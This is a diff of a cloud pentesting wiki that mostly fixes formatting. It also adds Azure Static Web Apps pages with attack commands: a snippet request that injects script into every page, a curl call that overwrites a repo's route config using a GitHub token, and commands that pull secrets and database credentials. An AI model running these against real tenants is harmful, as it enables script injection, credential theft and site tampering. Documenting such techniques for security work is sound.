MIGRATION TYPOS

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

@@ -508,7 +508,7 @@ An example can be find in the following expandable:
 
 <details>
 
-<summary>Github Action Build &#x26; Push Docker Image</summary>
+<summary>Github Action Build & Push Docker Image</summary>
 
 ```yaml
 [...]

src/pentesting-ci-cd/vercel-security.md

@@ -20,7 +20,7 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
   - **Misconfiguration:** Allows to transfer the project to another team
   - **Risk:** An attacker could steal the project
 - **Delete Project**
-  - **Misconfiguration:** Allows to delete the project 
+  - **Misconfiguration:** Allows to delete the project
   - **Risk:** Delete the prject
 
 ---
@@ -287,7 +287,7 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
   - **Misconfiguration:** Allows to transfer all the projects to another team
   - **Risk:** An attacker could steal the projects
 - **Delete Project**
-  - **Misconfiguration:** Allows to delete the team with all the projects 
+  - **Misconfiguration:** Allows to delete the team with all the projects
   - **Risk:** Delete the projects
 
 ---
@@ -344,7 +344,7 @@ An **Access Group** in Vercel is a collection of projects and team members with
 #### Security Configurations:
 
 - **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
-  - **Misconfiguration:** 
+  - **Misconfiguration:**
     - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
     - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
   - **Risks:**

src/pentesting-cloud/aws-security/aws-basic-information/README.md

@@ -118,7 +118,7 @@ Users can have **MFA enabled to login** through the console. API tokens of MFA e
 - **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
 
 Whenever you need to **change the Access Key** this is the process you should follow:\
-&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
+_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
 
 ### MFA - Multi Factor Authentication
 

src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md

@@ -18,8 +18,8 @@ Temporary tokens cannot be listed, so maintaining an active temporary token is a
 
 # With MFA
 aws sts get-session-token \
-    --serial-number <mfa-device-name> \
-    --token-code <code-from-token>
+    --serial-number <mfa-device-name> \
+    --token-code <code-from-token>
 
 # Hardware device name is usually the number from the back of the device, such as GAHT12345678
 <strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md

@@ -105,7 +105,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
 An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
-&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
 
 ## References
 

src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md

@@ -168,21 +168,21 @@ For this you might need to have access to the **identity provider**. If that is
 Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
 
 <pre class="language-bash"><code class="lang-bash">aws cognito-identity get-id \
-    --identity-pool-id &#x3C;identity_pool_id> \
-    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+    --identity-pool-id <identity_pool_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 # Get the identity_id from the previous commnad response
 aws cognito-identity get-credentials-for-identity \
-    --identity-id &#x3C;identity_id> \
-    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+    --identity-id <identity_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 
 # In the IdToken you can find roles a user has access because of User Pool Groups
 # User the --custom-role-arn to get credentials to a specific role
 aws cognito-identity get-credentials-for-identity \
-    --identity-id &#x3C;identity_id> \
-<strong>    --custom-role-arn &#x3C;role_arn> \
-</strong>    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+    --identity-id <identity_id> \
+<strong>    --custom-role-arn <role_arn> \
+</strong>    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 </code></pre>
 
 > [!WARNING]

src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md

@@ -8,7 +8,7 @@
 
 **Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
 
-There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." 
+There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."
 
 ### Types of Schedules
 

src/pentesting-cloud/azure-security/az-basic-information/README.md

@@ -32,7 +32,7 @@
 
 All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
 
-<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
+<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
 
 ### Azure Resource IDs
 
@@ -148,7 +148,7 @@ An **App Registration** is a configuration that allows an application to integra
 
 1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
 2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
-3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
+3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).
    1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
 4. **API Permissions:** Specifies what resources or APIs the app can access.
 5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
@@ -176,7 +176,7 @@ An **App Registration** is a configuration that allows an application to integra
 
 - Users can request admin consent to apps they are unable to consent to
 - If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
-  - Configure also if users will receive email notifications and expiration reminders&#x20;
+  - Configure also if users will receive email notifications and expiration reminders
 
 ### **Managed Identity (Metadata)**
 

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md

@@ -14,15 +14,15 @@ There are different ways a machine can be connected to the cloud:
 
 #### Workplace joined
 
-<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large</a></p></figcaption></figure>
+<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large</a></p></figcaption></figure>
 
 #### Hybrid joined
 
-<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large</a></p></figcaption></figure>
+<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large</a></p></figcaption></figure>
 
 #### Workplace joined on AADJ or Hybrid
 
-<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large</a></p></figcaption></figure>
+<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large</a></p></figcaption></figure>
 
 ### Tokens and limitations <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
 

src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md

@@ -0,0 +1,71 @@
+# Az - Static Web Apps Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Static Web Apps
+
+For more information about this service check:
+
+{{#ref}}
+../az-services/az-static-web-apps.md
+{{#endref}}
+
+### Microsoft.Web/staticSites/snippets/write
+
+It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).
+
+The fllowing command create an snippet that will always be loaded by the web app::
+
+```bash
+az rest \
+    --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "name": "supersnippet",
+            "location": "Body",
+            "applicableEnvironmentsMode": "AllEnvironments",
+            "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
+            "environments": [],
+            "insertBottom": false
+        }
+    }'
+```
+
+### Overwrite file - Overwrite routes, HTML, JS...
+
+It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message.
+
+This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by oevrwritting the `staticwebapp.config.json` file.
+
+> [!WARNING]
+> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github.
+
+```bash
+curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
+-H "Content-Type: application/json" \
+-d '{
+    "commit": {
+        "message": "Update static web app route configuration",
+        "branchName": "main",
+        "committer": {
+            "name": "Azure App Service",
+            "email": "donotreply@microsoft.com"
+        },
+        "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
+        "filePath": "staticwebapp.config.json",
+        "message": "Update static web app route configuration",
+        "repoName": "carlospolop/my-first-static-web-app",
+        "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
+    },
+    "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
+}'
+```
+
+
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+
+

src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md

@@ -20,7 +20,7 @@ Once you find where the code of the function is located if you have write permis
 
 The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
 
-This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from 
+This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from
 
 ```bash
 az functionapp config appsettings list \
@@ -211,7 +211,7 @@ az rest --method POST \
 
 ### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
 
-These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located. 
+These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located.
 
 It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application:
 

src/pentesting-cloud/azure-security/az-services/az-azuread.md

@@ -991,7 +991,7 @@ When PIM is enabled it's possible to configure each role with certain requiremen
 - Require justification on activation
 - Require ticket information on activation
 - Require approval to activate
-- Max time to expire the elegible assignments 
+- Max time to expire the elegible assignments
 - A lot more configuration on when and who to send notifications when certain actions happen with that role
 
 ### Conditional Access Policies <a href="#title-text" id="title-text"></a>

src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md

@@ -0,0 +1,59 @@
+
+# Az - Static Web Apps
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Static Web Apps Basic Information
+
+
+- **Routes**: It's possible to change the routes of a static webapp by modifying the `staticwebapp.config.json` file. This file is located in the root of the repository and **contains the routes that the app will use**.
+
+## Enumeration
+
+```bash
+# List Static Webapps
+az staticwebapp list --output table
+
+# Get Static Webapp details
+az staticwebapp show --name <name> --resource-group <res-group> --output table
+
+# Get appsettings
+az staticwebapp appsettings list --name <name>
+
+# Get env information
+az staticwebapp environment list --name <name>
+az staticwebapp environment functions --name <name>
+
+# Get API key
+az staticwebapp secrets list --name <name>
+
+# Get invited users
+az staticwebapp users list --name <name>
+
+# Get database connections
+az rest --method GET \
+  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections?api-version=2021-03-01"
+
+## Once you have the database connection name ("default" by default) you can get the connection string with the credentials
+az rest --method POST \
+  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections/default/show?api-version=2021-03-01"
+```
+
+## Examples to generate Web Apps
+
+
+## Post Exploitation
+
+{{#ref}}
+../az-privilege-escalation/az-static-web-apps-post-exploitation.md
+{{#endref}}
+
+## References
+
+- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
+- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+
+

src/pentesting-cloud/azure-security/az-services/az-storage.md

@@ -53,7 +53,7 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide
 
 ### Storage endpoints
 
-<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://&#x3C;storage-account>.blob.core.windows.net</code><br><br><code>https://&#x3C;stg-acc>.blob.core.windows.net/&#x3C;container-name>?restype=container&#x26;comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://&#x3C;storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://&#x3C;storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://&#x3C;storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://&#x3C;storage-account>.table.core.windows.net</code></td></tr></tbody></table>
+<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://<storage-account>.blob.core.windows.net</code><br><br><code>https://<stg-acc>.blob.core.windows.net/<container-name>?restype=container&comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://<storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://<storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://<storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://<storage-account>.table.core.windows.net</code></td></tr></tbody></table>
 
 ### Public Exposure